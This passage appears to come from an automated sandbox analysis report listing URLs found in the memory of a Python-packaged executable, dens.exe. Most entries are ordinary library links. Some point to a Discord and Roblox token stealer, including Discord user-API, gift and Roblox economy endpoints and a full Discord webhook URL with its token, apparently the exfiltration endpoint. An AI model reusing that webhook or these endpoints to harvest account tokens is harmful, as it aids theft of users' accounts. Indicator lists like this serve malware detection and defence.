            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://blog.jaraco.com/skeleton
            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/$
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
            Source: dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
            Source: dens.exe, 00000001.00000003.2046330120.000002D9AB511000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028227051.000002D9AB4D8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9ABFF3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037448253.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2061882117.000002D9AB512000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033951676.000002D9AB510000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/store/skus/$
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038212780.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2054186252.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9AC036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyyg
            Source: dens.exe, 00000001.00000003.2028227051.000002D9AB4D8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9ABFF3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037448253.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033864513.000002D9AB513000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
            Source: dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
            Source: dens.exe, 00000001.00000003.1703254242.000002D9AAE13000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701761331.000002D9AAE13000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042804568.000002D9AADFE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041785184.000002D9AADEF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049463815.000002D9AAE14000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html
            Source: dens.exe, 00000001.00000003.1694726619.000002D9AAA0A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057356883.000002D9AA84C000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694886208.000002D9AAA0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/argparse.html#description
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/argparse.html#epilog
            Source: dens.exe, 00000001.00000002.2063237923.000002D9ABD20000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060656664.000002D9AB1FE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA84C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA84C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA84C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
            Source: dens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
            Source: dens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA84C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
            Source: dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057290070.000002D9A8F18000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1693574713.000002D9A8F19000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2056310875.000002D9A8F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#module-importlib.resources
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
            Source: dens.exe, 00000001.00000002.2058007362.000002D9AA9DC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041163716.000002D9AA9CE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2048626589.000002D9AA9D4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1698481560.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/P
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
            Source: dens.exe, 00000000.00000003.1676624069.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fsf.org/
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90656000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1792575862.000001DE906E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: dens.exe, 00000001.00000003.1701168036.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB26D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Lucretiel/autocommand
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Lucretiel/autocommand/issues
            Source: METADATA.0.drString found in binary or memory: https://github.com/Lucretiel/autocommand/issues/18
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AD7D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterp
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://github.com/astral-sh/ruff
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect/actions?query=workflow%3A%22tests%22
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context/actions/workflows/main.yml/badge.svg
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context/actions?query=workflow%3A%22tests%22
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools/actions/workflows/main.yml/badge.svg
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/keyring/commit/a85a7cbc6c909f8121660ed1f7b487f99a1c2bf7
            Source: dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
            Source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
            Source: dens.exe, 00000001.00000002.2062222294.000002D9AB5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
            Source: dens.exe, 00000001.00000002.2060074446.000002D9AAF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
            Source: dens.exe, 00000001.00000002.2060074446.000002D9AAF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/wheel
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/wheel/issues
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
            Source: dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
            Source: dens.exe, 00000001.00000003.2047858320.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041785184.000002D9AADEF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044813767.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2059506844.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
            Source: dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: dens.exe, 00000001.00000002.2057866234.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695470478.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050249155.000002D9AA9A5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053260653.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695730686.000002D9AACF6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AACF7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042588070.000002D9AA996000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053626399.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1698481560.000002D9AA97E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
